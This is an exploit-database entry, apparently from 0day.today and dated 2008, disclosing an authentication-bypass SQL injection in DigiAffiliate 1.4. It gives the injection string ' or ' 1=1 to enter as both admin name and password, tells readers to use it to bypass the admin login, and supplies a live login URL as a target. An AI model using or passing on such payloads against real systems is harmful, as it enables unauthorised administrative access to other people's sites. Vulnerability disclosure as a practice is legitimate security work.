id: 4135
date: 11/08/2008
title: DigiAffiliate <= 1.4 (Auth Bypass) SQL Injection Vulnerability
author: d3b4g
cves: 

==============================================================
DigiAffiliate <= 1.4 (Auth Bypass) SQL Injection Vulnerability
==============================================================


###############################################################################################
[-] DigiAffiliate <= V1.4 (Auth bypass) SQL Injection Vulnerability
[-] Discovered By : d3b4gd         
[-] Greetz : All my freind         
################################################################################################
Use these information to bypass adminlogin

admin :   ' or ' 1=1
password: ' or ' 1=1

Live demo :

http://www.digiappz.com/digiaffiliate2/login.asp
--------------------------------------------
--------------------------------------------



#  0day.today [2023-03-26]  #